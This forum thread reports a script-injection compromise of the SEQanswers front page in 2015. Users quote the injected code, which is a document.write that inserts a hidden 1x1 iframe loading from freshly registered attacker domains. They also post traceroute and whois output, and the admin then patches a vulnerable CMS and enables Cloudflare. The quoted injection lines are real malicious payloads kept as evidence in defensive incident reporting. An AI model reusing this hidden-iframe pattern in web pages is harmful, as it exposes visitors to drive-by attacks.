Header Leaderboard Ad

Collapse

script injection : seqanswers security Q?

Collapse

Announcement

Collapse
No announcement yet.
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • script injection : seqanswers security Q?

    Just checking on this.

    Is this legit? If it's not, are others seeing this too?

    When I load seqanswers.com ; the first html is a request for a script from
    http://xrrkp.yourrevolution.xyz:9449

    Example:
    <script>document.write("<iframe width='1' height='1' src='http://xrrkp.yourrevolution.xyz:9449/mirror.shtml?boom=78825&foul=ashamed&close=9014&listen=49237&peril=queer&snarl=encourage&monday=60544&quiver=86886&build=42380' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
    <head>

    <meta http-equiv="Cache-Control" content="no-cache" />
    <meta http-equiv="Pragma" content="no-cache" />
    <meta http-equiv="Expires" content="0" />

    <title>SEQanswers Home </title>



    This is blocked by my local antivirus software.

    The domain http://www.domainiq.com/domain?yourrevolution.xyz
    was registered 9 hours ago.

    Is there something fishy going on?
    ___
    Edit:

    Now is trying to load from http://pkpgk.yourspin.xyz:32551
    Is anybody else getting this? According to http://www.domainiq.com/domain?yourspin.xyz , Max Vlapet registered it 10 hours ago.

    ____

    I know ad companies use pop-up domains to bypass adblockers, but this looks very fishy.

    Can others "view source" and seqanswers and confirm if this is specific to seqanswers.com ? Just check the first lines of text.

    I am getting this on both Chrome and Mozilla.

    Traceroute is ...
    traceroute 46.108.156.159
    traceroute to 46.108.156.159 (46.108.156.159), 30 hops max, 60 byte packets
    (first 8 internal to my site removed)
    9 66-192-62-13.static.twtelecom.net (66.192.62.13) 4.129 ms 4.642 ms 4.623 ms
    10 35.248.2.162 (35.248.2.162) 15.903 ms 15.884 ms 15.748 ms
    11 xe-0.equinix.asbnva01.us.bb.gin.ntt.net (206.126.236.12) 5.522 ms 5.877 ms 5.051 ms
    12 ae-2.r22.asbnva02.us.bb.gin.ntt.net (129.250.5.136) 5.045 ms 5.312 ms 4.661 ms
    13 ae-4.r20.frnkge04.de.bb.gin.ntt.net (129.250.3.21) 92.425 ms 95.965 ms 90.690 ms
    14 ae-2.r02.frnkge04.de.bb.gin.ntt.net (129.250.3.94) 133.892 ms 145.722 ms ae-3.r03.frnkge03.de.bb.gin.ntt.net (129.250.6.249) 130.568 ms
    15 ae-4.r00.buchro01.ro.bb.gin.ntt.net (129.250.3.79) 126.092 ms 129.742 ms 124.872 ms
    16 te5-6-600-bb1.buc1.ro.m247.ro (83.217.231.94) 120.913 ms 132.615 ms 118.762 ms
    17 * * *
    18 no-rdns.indicii.ro (46.108.156.159) 133.803 ms 129.671 ms 128.985 ms
    ____
    Edit: others at my site are getting it, too.
    Last edited by Richard Finney; 07-09-2015, 07:25 AM.

  • #2
    Code:
    <script>document.write("<iframe width='1' height='1' src='http://gcqwgonvjv.your-trend.xyz:48310/punish/74636/alter/wonderful/load/79852/chuckle/another/date/33701/arrange/562/sugar/67761/matter/49098/find/33964/tidings/hush/opportunity/39426/' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
    <head>
    
    	<meta http-equiv="Cache-Control" content="no-cache" />
    	<meta http-equiv="Pragma" content="no-cache" />
    	<meta http-equiv="Expires" content="0" />
    
    
    <title>SEQanswers Home </title>

    Comment


    • #3
      your-trend.xzy is the same server (in Romania) ?


      So it's not some local injection.

      Whois reports Domain name is reported as

      Email is associated with ~46 domains
      Reverse Whois
      Registrant Org Max Vlapet is associated with ~40 other domains
      Dates Created on 2015-07-09 - Expires on 2016-07-09 - Updated on 2015-07-09
      Whois Server whois.nic.xyz
      Website
      Website Title None given.
      Whois Record ( last updated on 2015-07-09 )
      Domain Name: YOUR-TREND.XYZ
      Domain ID: D8789917-CNIC
      WHOIS Server: whois.alpnames.com
      Referral URL: http://www.alpnames.com
      Updated Date: 2015-07-09T14:14:47.0Z
      Creation Date: 2015-07-09T14:14:46.0Z
      Registry Expiry Date: 2016-07-09T23:59:59.0Z
      Sponsoring Registrar: AlpNames Limited
      Sponsoring Registrar IANA ID: 1857
      Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
      Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
      Domain Status: addPeriod https://icann.org/epp#addPeriod
      Registrant ID: ALP_44867689
      Registrant Name: Max Vlapet
      Registrant Organization: N/A
      Registrant Street: Mausoleum str, pl.13
      Registrant City: Moscow
      Registrant State/Province: Moscow
      Registrant Postal Code: 123006
      Registrant Country: RU
      Registrant Phone: +7.4959826524
      Registrant Phone Ext:
      Registrant Fax:
      Registrant Fax Ext:
      Registrant Email:
      Admin ID: ALP_44867689
      Admin Name: Max Vlapet
      Admin Organization: N/A
      Admin Street: Mausoleum str, pl.13
      Admin City: Moscow
      Admin State/Province: Moscow
      Admin Postal Code: 123006
      Admin Country: RU
      Admin Phone: +7.4959826524
      Admin Phone Ext:
      Admin Fax:
      Admin Fax Ext:
      Admin Email:
      Tech ID: ALP_44867689
      Tech Name: Max Vlapet
      Tech Organization: N/A
      Tech Street: Mausoleum str, pl.13
      Tech City: Moscow
      Tech State/Province: Moscow
      Tech Postal Code: 123006
      Tech Country: RU
      Tech Phone: +7.4959826524
      Tech Phone Ext:
      Tech Fax:
      Tech Fax Ext:
      Tech Email:
      Name Server: NS2.YOUR-TREND.XYZ
      Name Server: NS1.YOUR-TREND.XYZ
      DNSSEC: unsigned
      Billing ID: ALP_44867689
      Billing Name: Max Vlapet
      Billing Organization: N/A
      Billing Street: Mausoleum str, pl.13
      Billing City: Moscow
      Billing State/Province: Moscow
      Billing Postal Code: 123006
      Billing Country: RU
      Billing Phone: +7.4959826524
      Billing Phone Ext:
      Billing Fax:
      Billing Fax Ext:
      Billing Email:

      Comment


      • #4
        Load seq answers front page.
        View the source.

        Note the PHISH(?) injection at the top?

        I got this just now ...

        <script>document.write("<iframe width='1' height='1' src='http://yuarzwpcf.yqxjoksljg.cf:9654/slip/49615/peculiar/curiosity/embarrass/15638/brandy/wife/disgust/80297/' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
        <html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
        <head>

        <meta http-equiv="Cache-Control" content="no-cache" />
        <meta http-equiv="Pragma" content="no-cache" />
        <meta http-equiv="Expires" content="0" />

        <title>SEQanswers Home </title>

        It's also loading from gvfwytmdxobu.tk , tk is not a supported top level domain; according to http://whois.icann.org/en/lookup?name=yqxjoksljg.cf ????

        https://en.wikipedia.org/wiki/.tk#Abuse
        Last edited by Richard Finney; 07-10-2015, 07:11 AM.

        Comment


        • #5
          Can you PM ECO about this?

          Comment


          • #6
            On it. Thanks guys.

            Comment


            • #7
              Whew. Pretty easy cleanup. Culprit was an old ad server.

              Forums have been upgraded and using a new adserver that is (at least for now) free of exploits.

              Please verify that you're not seeing the previous problems, and let me know asap if you see any other weirdness.

              Sorry about that all!

              Comment


              • #8
                I'm not seeing the injected script.

                Comment


                • #9
                  Thanks for fixing this quickly!

                  Comment


                  • #10
                    Script injection is happening again. Fri Jul 17 10:49:19 EDT 2015

                    This time it's ...
                    zosnoeem.lzokxrvrcmtprgesy.ml

                    http://whois.domaintools.com/lzokxrvrcmtprgesy.ml

                    Comment


                    • #11
                      I have let ECO know.

                      Comment


                      • #12
                        Got it again. Turns out it wasn't the ad server. Not going to say what it is for now.

                        Comment


                        • #13
                          Flood attacks whenever it happens...

                          Comment


                          • #14
                            Upping the security level of cloudflare to prevent it again until I can upgrade the vulnerable component. Apologies for the 5 second delay.

                            Comment


                            • #15
                              Thanks to Richard Finney for notification and GenoMax for his rapid locating of both 1.) me and 2.) the likely exploit.

                              The version of the front page CMS I'm using had an exploit, which I have upgraded.

                              I'm going to leave the CloudFlare security challenge on through the weekend to stop further DDoS/overload attacks, I welcome feedback on how annoying it is.

                              Comment

                              Working...
                              X